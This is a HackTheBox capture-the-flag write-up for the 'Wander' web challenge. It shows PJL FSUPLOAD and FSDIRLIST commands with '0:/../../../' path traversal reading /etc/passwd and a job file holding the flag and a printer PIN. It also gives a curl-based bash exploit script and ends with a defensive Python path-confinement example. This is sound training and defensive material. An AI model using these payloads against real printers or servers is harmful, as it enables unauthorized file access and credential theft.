web | free | medium

Wander

hackthebox

Task: Exploit a web-based printer management interface to read the flag from the server filesystem. Solution: Use PJL (Printer Job Language) FSUPLOAD command with path traversal (0:/../../../) to escape the virtual filesystem and read /home/default/readyjob containing the flag.

$ ls tags/ techniques/
path_traversal  pjl_exploitation  filesystem_enumeration

Wander - HackTheBox

Description

My uncle isn't allowing me to print documents. He's off to vacation and I need a PIN to unlock this printer. All I found is a web server where this printer is managed from.

Target: http://94.237.120.74:48334

Analysis

Reconnaissance

  1. Web server running Werkzeug/2.0.1 Python/3.7.11 (Flask)
  2. Main dashboard at / shows "Wander Dashboard" with "HTB Printer"
  3. Found /jobs page with a form to send PJL (Printer Job Language) commands
  4. Form placeholder shows @PJL INFO ID

Vulnerability Discovery

The web application accepts PJL commands and forwards them to a printer emulator. This is a classic printer exploitation scenario where PJL filesystem commands can be abused.

Key PJL commands that worked:

  • @PJL INFO ID - Returns "HTB Printer"
  • @PJL INFO STATUS - Returns printer status (CODE=10001, DISPLAY="Ready", ONLINE=True)
  • @PJL FSDIRLIST NAME="0:/" ENTRY=1 - Lists printer filesystem directories

Path Traversal in FSUPLOAD

The @PJL FSUPLOAD command is vulnerable to path traversal. The printer uses a virtual filesystem starting at 0:/, but we can escape it using ../:

@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000

This allowed reading arbitrary files from the server filesystem.

Solution

Step 1: Enumerate Printer Filesystem

First, list the printer's virtual filesystem:

@PJL FSDIRLIST NAME="0:/" ENTRY=1

Step 2: Confirm Path Traversal

Test path traversal by reading /etc/passwd:

@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000

Step 3: Enumerate Root Filesystem

Use FSDIRLIST with path traversal to enumerate directories:

@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1

Found directories: etc, conf, home, rw, tmp, csr_misc, printer

Step 4: Explore Home Directory

@PJL FSDIRLIST NAME="0:/../../../home/" ENTRY=1
@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1

Found a file called readyjob in /home/default/.

Step 5: Read the Flag

@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000

The file contained a PJL job with embedded credentials:

@PJL COMMENT FLAG = "HTB{w4lk_4nd_w0nd3r}" 
@PJL SET USERNAME="default"
@PJL SET HOLDKEY="8214"

Exploit Script

#!/bin/bash
# Wander - HTB Web Challenge Exploit

TARGET="http://94.237.120.74:48334"

# Function to send PJL command
send_pjl() {
    local cmd="$1"
    curl -s "$TARGET/jobs" \
        --data-urlencode "cmd=$cmd" \
        -X POST
}

# Step 1: Verify printer
echo "[*] Checking printer ID..."
send_pjl '@PJL INFO ID'

# Step 2: List root filesystem via path traversal
echo "[*] Enumerating filesystem..."
send_pjl '@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1'

# Step 3: List home directory
echo "[*] Checking /home/default/..."
send_pjl '@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1'

# Step 4: Read the flag file
echo "[*] Reading flag..."
send_pjl '@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000'

Key Findings

Item                    Value
Flag                    HTB{w4lk_4nd_w0nd3r}
Printer PIN (HOLDKEY)   8214
Username                default

Key Indicators

Use this technique when you see:

  • Web interface for printer management
  • PJL command input fields
  • Printer Job Language references
  • Virtual filesystem paths like 0:/
  • FSUPLOAD, FSDIRLIST, or similar filesystem commands

PJL Command Reference

Command                                     Description
@PJL INFO ID                                Get printer identification
@PJL INFO STATUS                            Get printer status
@PJL FSDIRLIST NAME="path" ENTRY=1          List directory contents
@PJL FSUPLOAD NAME="path" OFFSET=0 SIZE=n   Read file contents
@PJL FSDOWNLOAD                             Write file (if enabled)
@PJL FSMKDIR                                Create directory
@PJL FSDELETE                               Delete file

Lessons Learned

  1. PJL Exploitation: Printer Job Language can be exploited for filesystem access on network printers
  2. Virtual Filesystem Escape: HP printers use a virtual filesystem (0:/) that can be escaped with path traversal
  3. Sensitive Data in Print Jobs: Printer job files may contain sensitive information like PINs and credentials
  4. Path Traversal: Always check for path traversal in file-related operations, especially in embedded systems
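
The server-side view of lesson 4, as an added example (not code from the challenge or from this writeup): a naive mapping of a PJL NAME="0:/..." argument to a host path next to a confined one. The volume root /opt/printer/vol0, the regex, and the function names are assumptions made for illustration.

```python
import os
import re

# Assumed host directory backing PJL volume 0: (hypothetical, not from the page).
VOLUME_ROOT = "/opt/printer/vol0"
# NAME="<volume>:<path>" argument shared by FSUPLOAD, FSDIRLIST and other FS* commands.
NAME_RE = re.compile(r'NAME\s*=\s*"(\d):[/\\]?([^"]*)"')

def resolve_naive(volume_root, command):
    """Flawed: join the client-supplied path onto the root and normalise it."""
    rel = NAME_RE.search(command).group(2)
    return os.path.normpath(os.path.join(volume_root, rel))

def resolve_confined(volume_root, command):
    """Return a host path inside volume_root, or None when the name is rejected."""
    match = NAME_RE.search(command)
    if match is None:
        return None
    rel = match.group(2).replace("\\", "/")
    root = os.path.realpath(volume_root)
    # realpath collapses ".." and follows symlinks *before* the containment test;
    # an absolute rel such as "/etc/passwd" replaces root in join() and fails it too.
    candidate = os.path.realpath(os.path.join(root, rel))
    # commonpath compares whole components, so "/opt/printer/vol0evil" does not
    # pass as it would with a plain startswith() prefix check.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

if __name__ == "__main__":
    samples = [  # constructed inputs; the second is the request from the writeup
        '@PJL FSUPLOAD NAME="0:/jobs/queue.txt" OFFSET=0 SIZE=100',
        '@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000',
        '@PJL FSDIRLIST NAME="0:/../vol0evil/" ENTRY=1',
    ]
    for cmd in samples:
        print(cmd)
        print("  naive   ->", resolve_naive(VOLUME_ROOT, cmd))
        print("  confined->", resolve_confined(VOLUME_ROOT, cmd))
```

A rejected name should be answered the same way as a missing file and logged, since a NAME argument containing ../ is a useful detection signal on its own.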
